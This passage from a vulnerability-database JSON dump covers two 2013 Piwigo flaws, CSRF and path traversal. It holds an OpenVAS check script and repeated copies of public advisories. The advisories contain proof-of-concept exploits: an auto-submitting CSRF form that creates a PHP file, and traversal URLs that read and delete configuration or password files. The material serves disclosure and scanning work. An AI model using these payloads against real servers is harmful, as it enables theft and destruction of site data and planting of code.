"cpe:2.3:a:piwigo:piwigo:2.4.6:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:1.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:1.7.0:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.4.4:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:1.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:1.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:1.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:1.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:1.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.0:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:1.7.3:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:1.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:1.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.1.4:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2020-05-12T17:27:27", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1468", "CVE-2013-1469"], "description": "This host is installed with Piwigo and is prone to cross site\n request forgery and path traversal vulnerabilities.", "modified": "2020-05-08T00:00:00", "published": "2013-03-21T00:00:00", "id": "OPENVAS:1361412562310803340", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310803340", "type": "openvas", "title": "Piwigo Cross Site Request Forgery and Path Traversal Vulnerabilities", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n#\n# Piwigo Cross Site Request Forgery and Path Traversal Vulnerabilities\n#\n# Authors:\n# Arun Kallavi <karun@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:piwigo:piwigo\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.803340\");\n script_version(\"2020-05-08T08:34:44+0000\");\n script_bugtraq_id(58016, 58080);\n script_cve_id(\"CVE-2013-1468\", \"CVE-2013-1469\");\n script_tag(name:\"cvss_base\", value:\"7.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-05-08 08:34:44 +0000 (Fri, 08 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2013-03-21 13:40:26 +0530 (Thu, 21 Mar 2013)\");\n script_name(\"Piwigo Cross Site Request Forgery and Path Traversal Vulnerabilities\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2013 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_piwigo_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"piwigo/installed\");\n\n script_xref(name:\"URL\", value:\"http://seclists.org/bugtraq/2013/Feb/152\");\n script_xref(name:\"URL\", value:\"http://www.exploit-db.com/exploits/24561\");\n script_xref(name:\"URL\", value:\"http://www.htbridge.com/advisory/HTB23144\");\n script_xref(name:\"URL\", value:\"http://piwigo.org/releases/2.4.7\");\n\n script_tag(name:\"insight\", value:\"- Flaw in the LocalFiles Editor plugin, it does not require multiple steps\n or explicit confirmation for sensitive transactions.\n\n - Input passed via 'dl' parameter to install.php is not properly sanitized before being used.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Piwigo version 2.4.7\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Piwigo and is prone to cross site\n request forgery and path traversal vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote attackers to create arbitrary PHP\n file or to retrieve and delete arbitrary files in the context of the\n affected application.\");\n\n script_tag(name:\"affected\", value:\"Piwigo version 2.4.6 and prior\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_app\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"host_details.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) )\n exit( 0 );\n\nif( ! dir = get_app_location( cpe:CPE, port:port ) )\n exit( 0 );\n\nif( dir == \"/\" )\n dir = \"\";\n\nurl = dir + '/install.php?dl=/../../local/config/ovtestlmn678.php';\n\n# Actual file, '/database.inc.php' gets deleted and information cannot be fetched.\n# Hence we are using dummy file 'ovtestlmn678.php' to check the\n# response. The patched version of application will generate a different\n# response.\n\nif( http_vuln_check( port:port, url:url, check_header:TRUE,\n pattern:\"Piwigo is already installed\" ) ) {\n report = http_report_vuln_url( port:port, url:url );\n security_message( port:port, data:report );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2018-02-15T21:19:41", "edition": 2, "description": "Piwigo version 2.4.5 suffers from cross site request forgery and path traversal vulnerabilities.", "published": "2013-03-01T00:00:00", "type": "zdt", "title": "Piwigo 2.4.6 Cross Site Request Forgery / Traversal Vulnerabilities", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1468", "CVE-2013-1469"], "modified": "2013-03-01T00:00:00", "id": "1337DAY-ID-20461", "href": "https://0day.today/exploit/description/20461", "sourceData": "Product: Piwigo\r\nVendor: Piwigo project\r\nVulnerable Version(s): 2.4.6 and probably prior\r\nTested Version: 2.4.6\r\nVendor Notification: February 6, 2013 \r\nVendor Patch: February 19, 2013 \r\nPublic Disclosure: February 27, 2013 \r\nVulnerability Type: Cross-Site Request Forgery [CWE-352], Path Traversal [CWE-22]\r\nCVE References: CVE-2013-1468, CVE-2013-1469\r\nRisk Level: High \r\nCVSSv2 Base Scores: 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C), 4 (AV:N/AC:H/Au:N/C:P/I:N/A:P)\r\nSolution Status: Fixed by Vendor\r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in Piwigo, which can be exploited to perform \u0421ross-Site Request Forgery and Path Traversal attacks.\r\n\r\n\r\n1) \u0421ross-Site Request Forgery (CSRF) in Piwigo: CVE-2013-1468\r\n\r\nThe vulnerability exists due to insufficient verification of the HTTP request origin in \"/admin.php\" script. A remote attacker can trick a logged-in administrator to visit a specially crafted webpage and create arbitrary PHP file on the remote server.\r\n\r\nThe following PoC (Proof of Concept) code creates a file \"file.php\" containing \"phpinfo();\", which can be later accessed via the http://[host]/file.php URL:\r\n\r\n\r\n<form action=\"http://[host]/admin.php?page=plugin-LocalFilesEditor\" method=\"post\" name=\"f1\">\r\n<input type=\"hidden\" name='edited_file' value='file.php'>\r\n<input type=\"hidden\" name='text' value=' phpinfo(); '>\r\n<input type=\"hidden\" name='submit' value='1'>\r\n<input type=\"submit\" id=\"btn\">\r\n</form>\r\n<script>\r\ndocument.f1.submit();\r\n</script>\r\n\r\n\r\nSuccessful exploitation requires that the \"LocalFiles Editor\" plugin is enabled (disabled by default).\r\n\r\n\r\n2) Path Traversal in Piwigo: CVE-2013-1469\r\n\r\nThe vulnerability exists due to insufficient filtration of user-supplied input in \"dl\" HTTP GET parameter passed to \"/install.php\" script. The script is present on the system after installation by default, and can be accessed by attacker without any restrictions. The vulnerable code is:\r\n\r\n\r\nif (!empty($_GET['dl']) && file_exists(PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl']))\r\n{\r\n $filename = PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl'];\r\n ...\r\n echo file_get_contents($filename);\r\n ...\r\n}\r\n\r\n\r\nHowever, the vulnerability may be exploited only if PHP 'file_exists' function returns 'true' both for \"C:/boot.ini\" (or any existing file) and for \"C:/any_non_existing_directory/../boot.ini\" (in our case the non-existing directory in path is \"/pwg_/\"). This works in default PHP installation on Windows platform (tested on Windows 7, PHP 5.3.x). In case of successful exploitation remote attacker can read content of arbitrary files on the vulnerable system. \r\nImportant: after being read the file is deleted (if web server has write permission to it).\r\n\r\n\r\nThe following PoC (Proof of Concept) code will display and delete the application's configuration file:\r\n\r\nhttp://piwigo/install.php?dl=/../../local/config/database.inc.php\r\n\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nUpgrade to Piwigo 2.4.7\r\n\r\nMore Information:\r\nhttp://piwigo.org/releases/2.4.7\r\nhttp://piwigo.org/bugs/view.php?id=0002843\r\nhttp://piwigo.org/bugs/view.php?id=0002844\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nReferences:\r\n\r\n[1] High-Tech Bridge Advisory HTB23144 - https://www.htbridge.com/advisory/HTB23144 - Multiple Vulnerabilities in Piwigo.\r\n[2] Piwigo - http://piwigo.org/ - Piwigo is a photo gallery software for the web, built by an active community of users and developers.\r\n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures.\r\n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.\n\n# 0day.today [2018-02-15] #", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/20461"}], "exploitdb": [{"lastseen": "2016-02-02T23:32:06", "description": "Piwigo 2.4.6 - Multiple Vulnerabilities. CVE-2013-1468,CVE-2013-1469. Webapps exploit for php platform", "published": "2013-03-01T00:00:00", "type": "exploitdb", "title": "Piwigo 2.4.6 - Multiple Vulnerabilities", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1468", "CVE-2013-1469"], "modified": "2013-03-01T00:00:00", "id": "EDB-ID:24561", "href": "https://www.exploit-db.com/exploits/24561/", "sourceData": "Advisory ID: HTB23144\r\nProduct: Piwigo\r\nVendor: Piwigo project\r\nVulnerable Version(s): 2.4.6 and probably prior\r\nTested Version: 2.4.6\r\nVendor Notification: February 6, 2013 \r\nVendor Patch: February 19, 2013 \r\nPublic Disclosure: February 27, 2013 \r\nVulnerability Type: Cross-Site Request Forgery [CWE-352], Path Traversal [CWE-22]\r\nCVE References: CVE-2013-1468, CVE-2013-1469\r\nRisk Level: High \r\nCVSSv2 Base Scores: 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C), 4 (AV:N/AC:H/Au:N/C:P/I:N/A:P)\r\nSolution Status: Fixed by Vendor\r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in Piwigo, which can be exploited to perform \u0421ross-Site Request Forgery and Path Traversal attacks.\r\n\r\n\r\n1) \u0421ross-Site Request Forgery (CSRF) in Piwigo: CVE-2013-1468\r\n\r\nThe vulnerability exists due to insufficient verification of the HTTP request origin in \"/admin.php\" script. A remote attacker can trick a logged-in administrator to visit a specially crafted webpage and create arbitrary PHP file on the remote server.\r\n\r\nThe following PoC (Proof of Concept) code creates a file \"file.php\" containing \"phpinfo();\", which can be later accessed via the http://[host]/file.php URL:\r\n\r\n\r\n<form action=\"http://[host]/admin.php?page=plugin-LocalFilesEditor\" method=\"post\" name=\"f1\">\r\n<input type=\"hidden\" name='edited_file' value='file.php'>\r\n<input type=\"hidden\" name='text' value=' phpinfo(); '>\r\n<input type=\"hidden\" name='submit' value='1'>\r\n<input type=\"submit\" id=\"btn\">\r\n</form>\r\n<script>\r\ndocument.f1.submit();\r\n</script>\r\n\r\n\r\nSuccessful exploitation requires that the \"LocalFiles Editor\" plugin is enabled (disabled by default).\r\n\r\n\r\n2) Path Traversal in Piwigo: CVE-2013-1469\r\n\r\nThe vulnerability exists due to insufficient filtration of user-supplied input in \"dl\" HTTP GET parameter passed to \"/install.php\" script. The script is present on the system after installation by default, and can be accessed by attacker without any restrictions. The vulnerable code is:\r\n\r\n\r\nif (!empty($_GET['dl']) && file_exists(PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl']))\r\n{\r\n $filename = PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl'];\r\n ...\r\n echo file_get_contents($filename);\r\n ...\r\n}\r\n\r\n\r\nHowever, the vulnerability may be exploited only if PHP 'file_exists' function returns 'true' both for \"C:/boot.ini\" (or any existing file) and for \"C:/any_non_existing_directory/../boot.ini\" (in our case the non-existing directory in path is \"/pwg_/\"). This works in default PHP installation on Windows platform (tested on Windows 7, PHP 5.3.x). In case of successful exploitation remote attacker can read content of arbitrary files on the vulnerable system. \r\nImportant: after being read the file is deleted (if web server has write permission to it).\r\n\r\n\r\nThe following PoC (Proof of Concept) code will display and delete the application's configuration file:\r\n\r\nhttp://piwigo/install.php?dl=/../../local/config/database.inc.php\r\n\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nUpgrade to Piwigo 2.4.7\r\n\r\nMore Information:\r\nhttp://piwigo.org/releases/2.4.7\r\nhttp://piwigo.org/bugs/view.php?id=0002843\r\nhttp://piwigo.org/bugs/view.php?id=0002844\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nReferences:\r\n\r\n[1] High-Tech Bridge Advisory HTB23144 - https://www.htbridge.com/advisory/HTB23144 - Multiple Vulnerabilities in Piwigo.\r\n[2] Piwigo - http://piwigo.org/ - Piwigo is a photo gallery software for the web, built by an active community of users and developers.\r\n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures.\r\n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nDisclaimer: The information provided in this Advisory is provided \"as is\" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/24561/"}, {"lastseen": "2016-02-02T23:28:13", "description": "Piwigo 2.4.6 (install.php) Remote Arbitrary File Read/Delete Vulnerability. CVE-2013-1469. Webapps exploit for php platform", "published": "2013-02-19T00:00:00", "type": "exploitdb", "title": "Piwigo 2.4.6 install.php Remote Arbitrary File Read/Delete Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1469"], "modified": "2013-02-19T00:00:00", "id": "EDB-ID:24520", "href": "https://www.exploit-db.com/exploits/24520/", "sourceData": "Piwigo 2.4.6 (install.php) Remote Arbitrary File Read/Delete Vulnerability\r\n\r\n\r\nVendor: Piwigo project\r\nProduct web page: http://www.piwigo.org\r\nAffected version: 2.4.6\r\n\r\nSummary: Piwigo is a photo gallery software for the web that comes\r\nwith powerful features to publish and manage your collection of\r\npictures.\r\n\r\nDesc: Input passed to the 'dl' parameter in 'install.php' script\r\nis not properly sanitised before being used to get the contents of\r\na resource or delete files. This can be exploited to read and delete\r\narbitrary data from local resources with the permissions of the web\r\nserver via directory traversal attack.\r\n\r\n====================================================================\r\n/install.php:\r\n-------------\r\n\r\n113: if (!empty($_GET['dl']) && file_exists(PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl']))\r\n114: {\r\n115: $filename = PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl'];\r\n116: header('Cache-Control: no-cache, must-revalidate');\r\n117: header('Pragma: no-cache');\r\n118: header('Content-Disposition: attachment; filename=\"database.inc.php\"');\r\n119: header('Content-Transfer-Encoding: binary');\r\n120: header('Content-Length: '.filesize($filename));\r\n121: echo file_get_contents($filename);\r\n122: unlink($filename);\r\n123: exit();\r\n124: }\r\n\r\n====================================================================\r\n\r\n\r\nTested on: Microsoft Windows 7 Ultimate SP1 (EN)\r\n Apache 2.4.2 (Win32)\r\n PHP 5.4.4\r\n MySQL 5.5.25a\r\n\r\n\r\nVulnerability discovered by Gjoko 'LiquidWorm' Krstic\r\n @zeroscience\r\n\r\n\r\nAdvisory ID: ZSL-2013-5127\r\nAdvisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5127.php\r\n\r\nVendor Patch: http://piwigo.org/bugs/view.php?id=2843\r\n\r\n\r\n\r\n15.02.2013\r\n\r\n\r\n--\r\n\r\nhttp://localhost/piwigo/install.php?dl=../../../../../../lio_passwords.txt\r\n\r\n", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/24520/"}], "freebsd": [{"lastseen": "2019-05-29T18:33:39", "bulletinFamily": "unix", "cvelist": ["CVE-2013-1468", "CVE-2013-1469"], "description": "\nHigh-Tech Bridge Security Research Lab reports:\n\nThe CSRF vulnerability exists due to insufficient verification of the\n\t HTTP request origin in \"/admin.php\" script. A remote attacker can trick\n\t a logged-in administrator to visit a specially crafted webpage and\n\t create arbitrary PHP file on the remote server.\nThe path traversal vulnerability exists due to insufficient filtration\n\t of user-supplied input in \"dl\" HTTP GET parameter passed to\n\t \"/install.php\" script. The script is present on the system after\n\t installation by default, and can be accessed by attacker without any\n\t restrictions.\n\n", "edition": 4, "modified": "2013-02-06T00:00:00", "published": "2013-02-06T00:00:00", "id": "EDD201A5-8FC3-11E2-B131-000C299B62E1", "href": "https://vuxml.freebsd.org/freebsd/edd201a5-8fc3-11e2-b131-000c299b62e1.html", "title": "piwigo -- CSRF/Path Traversal", "type": "freebsd", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:47", "bulletinFamily": "software", "cvelist": ["CVE-2013-1468", "CVE-2013-1469"], "description": "\r\n\r\nAdvisory ID: HTB23144\r\nProduct: Piwigo\r\nVendor: Piwigo project\r\nVulnerable Version(s): 2.4.6 and probably prior\r\nTested Version: 2.4.6\r\nVendor Notification: February 6, 2013 \r\nVendor Patch: February 19, 2013 \r\nPublic Disclosure: February 27, 2013 \r\nVulnerability Type: Cross-Site Request Forgery [CWE-352], Path Traversal [CWE-22]\r\nCVE References: CVE-2013-1468, CVE-2013-1469\r\nRisk Level: High \r\nCVSSv2 Base Scores: 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C), 4 (AV:N/AC:H/Au:N/C:P/I:N/A:P)\r\nSolution Status: Fixed by Vendor\r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in Piwigo, which can be exploited to perform \u0421ross-Site Request Forgery and Path Traversal attacks.\r\n\r\n\r\n1) \u0421ross-Site Request Forgery (CSRF) in Piwigo: CVE-2013-1468\r\n\r\nThe vulnerability exists due to insufficient verification of the HTTP request origin in "/admin.php" script. A remote attacker can trick a logged-in administrator to visit a specially crafted webpage and create arbitrary PHP file on the remote server.\r\n\r\nThe following PoC (Proof of Concept) code creates a file "file.php" containing "phpinfo();", which can be later accessed via the http://[host]/file.php URL:\r\n\r\n\r\n<form action="http://[host]/admin.php?page=plugin-LocalFilesEditor" method="post" name="f1">\r\n<input type="hidden" name='edited_file' value='file.php'>\r\n<input type="hidden" name='text' value=' phpinfo(); '>\r\n<input type="hidden" name='submit' value='1'>\r\n<input type="submit" id="btn">\r\n</form>\r\n<script>\r\ndocument.f1.submit();\r\n</script>\r\n\r\n\r\nSuccessful exploitation requires that the "LocalFiles Editor" plugin is enabled (disabled by default).\r\n\r\n\r\n2) Path Traversal in Piwigo: CVE-2013-1469\r\n\r\nThe vulnerability exists due to insufficient filtration of user-supplied input in "dl" HTTP GET parameter passed to "/install.php" script. The script is present on the system after installation by default, and can be accessed by attacker without any restrictions. The vulnerable code is:\r\n\r\n\r\nif (!empty($_GET['dl']) && file_exists(PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl']))\r\n{\r\n $filename = PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl'];\r\n ...\r\n echo file_get_contents($filename);\r\n ...\r\n}\r\n\r\n\r\nHowever, the vulnerability may be exploited only if PHP 'file_exists' function returns 'true' both for "C:/boot.ini" (or any existing file) and for "C:/any_non_existing_directory/../boot.ini" (in our case the non-existing directory in path is "/pwg_/"). This works in default PHP installation on Windows platform (tested on Windows 7, PHP 5.3.x). In case of successful exploitation remote attacker can read content of arbitrary files on the vulnerable system. \r\nImportant: after being read the file is deleted (if web server has write permission to it).\r\n\r\n\r\nThe following PoC (Proof of Concept) code will display and delete the application's configuration file:\r\n\r\nhttp://piwigo/install.php?dl=/../../local/config/database.inc.php\r\n\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nUpgrade to Piwigo 2.4.7\r\n\r\nMore Information:\r\nhttp://piwigo.org/releases/2.4.7\r\nhttp://piwigo.org/bugs/view.php?id=0002843\r\nhttp://piwigo.org/bugs/view.php?id=0002844\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nReferences:\r\n\r\n[1] High-Tech Bridge Advisory HTB23144 - https://www.htbridge.com/advisory/HTB23144 - Multiple Vulnerabilities in Piwigo.\r\n[2] Piwigo - http://piwigo.org/ - Piwigo is a photo gallery software for the web, built by an active community of users and developers.\r\n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures.\r\n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nDisclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.\r\n", "edition": 1, "modified": "2013-03-03T00:00:00", "published": "2013-03-03T00:00:00", "id": "SECURITYVULNS:DOC:29128", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:29128", "title": "Multiple Vulnerabilities in Piwigo", "type": "securityvulns", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:50", "bulletinFamily": "software", "cvelist": ["CVE-2013-0306", "CVE-2013-1665", "CVE-2013-1470", "CVE-2013-0305", "CVE-2013-1468", "CVE-2013-1423", "CVE-2013-1469", "CVE-2013-0253", "CVE-2012-4520"], "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "edition": 1, "modified": "2013-03-03T00:00:00", "published": "2013-03-03T00:00:00", "id": "SECURITYVULNS:VULN:12923", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:12923", "title": "Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:20:18", "description": "", "published": "2013-02-28T00:00:00", "type": "packetstorm", "title": "Piwigo 2.4.6 Cross Site Request Forgery / Traversal", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1468", "CVE-2013-1469"], "modified": "2013-02-28T00:00:00", "id": "PACKETSTORM:120592", "href": "https://packetstormsecurity.com/files/120592/Piwigo-2.4.6-Cross-Site-Request-Forgery-Traversal.html", "sourceData": "`Advisory ID: HTB23144 \nProduct: Piwigo \nVendor: Piwigo project \nVulnerable Version(s): 2.4.6 and probably prior \nTested Version: 2.4.6 \nVendor Notification: February 6, 2013 \nVendor Patch: February 19, 2013 \nPublic Disclosure: February 27, 2013 \nVulnerability Type: Cross-Site Request Forgery [CWE-352], Path Traversal [CWE-22] \nCVE References: CVE-2013-1468, CVE-2013-1469 \nRisk Level: High \nCVSSv2 Base Scores: 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C), 4 (AV:N/AC:H/Au:N/C:P/I:N/A:P) \nSolution Status: Fixed by Vendor \nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \n \n----------------------------------------------------------------------------------------------- \n \nAdvisory Details: \n \nHigh-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in Piwigo, which can be exploited to perform \u0421ross-Site Request Forgery and Path Traversal attacks. \n \n \n1) \u0421ross-Site Request Forgery (CSRF) in Piwigo: CVE-2013-1468 \n \nThe vulnerability exists due to insufficient verification of the HTTP request origin in \"/admin.php\" script. A remote attacker can trick a logged-in administrator to visit a specially crafted webpage and create arbitrary PHP file on the remote server. \n \nThe following PoC (Proof of Concept) code creates a file \"file.php\" containing \"phpinfo();\", which can be later accessed via the http://[host]/file.php URL: \n \n \n<form action=\"http://[host]/admin.php?page=plugin-LocalFilesEditor\" method=\"post\" name=\"f1\"> \n<input type=\"hidden\" name='edited_file' value='file.php'> \n<input type=\"hidden\" name='text' value=' phpinfo(); '> \n<input type=\"hidden\" name='submit' value='1'> \n<input type=\"submit\" id=\"btn\"> \n</form> \n<script> \ndocument.f1.submit(); \n</script> \n \n \nSuccessful exploitation requires that the \"LocalFiles Editor\" plugin is enabled (disabled by default). \n \n \n2) Path Traversal in Piwigo: CVE-2013-1469 \n \nThe vulnerability exists due to insufficient filtration of user-supplied input in \"dl\" HTTP GET parameter passed to \"/install.php\" script. The script is present on the system after installation by default, and can be accessed by attacker without any restrictions. The vulnerable code is: \n \n \nif (!empty($_GET['dl']) && file_exists(PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl'])) \n{ \n$filename = PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl']; \n... \necho file_get_contents($filename); \n... \n} \n \n \nHowever, the vulnerability may be exploited only if PHP 'file_exists' function returns 'true' both for \"C:/boot.ini\" (or any existing file) and for \"C:/any_non_existing_directory/../boot.ini\" (in our case the non-existing directory in path is \"/pwg_/\"). This works in default PHP installation on Windows platform (tested on Windows 7, PHP 5.3.x). In case of successful exploitation remote attacker can read content of arbitrary files on the vulnerable system. \nImportant: after being read the file is deleted (if web server has write permission to it). \n \n \nThe following PoC (Proof of Concept) code will display and delete the application's configuration file: \n \nhttp://piwigo/install.php?dl=/../../local/config/database.inc.php \n \n \n----------------------------------------------------------------------------------------------- \n \nSolution: \n \nUpgrade to Piwigo 2.4.7 \n \nMore Information: \nhttp://piwigo.org/releases/2.4.7 \nhttp://piwigo.org/bugs/view.php?id=0002843 \nhttp://piwigo.org/bugs/view.php?id=0002844 \n \n----------------------------------------------------------------------------------------------- \n \nReferences: \n \n[1] High-Tech Bridge Advisory HTB23144 - https://www.htbridge.com/advisory/HTB23144 - Multiple Vulnerabilities in Piwigo. \n[2] Piwigo - http://piwigo.org/ - Piwigo is a photo gallery software for the web, built by an active community of users and developers. \n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures. \n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. \n \n----------------------------------------------------------------------------------------------- \n \nDisclaimer: The information provided in this Advisory is provided \"as is\" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References. \n`\n", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/120592/piwigo246-traversalxsrf.txt"}, {"lastseen": "2016-12-05T22:11:36", "description": "", "published": "2014-12-20T00:00:00", "type": "packetstorm", "title": "Piwigo 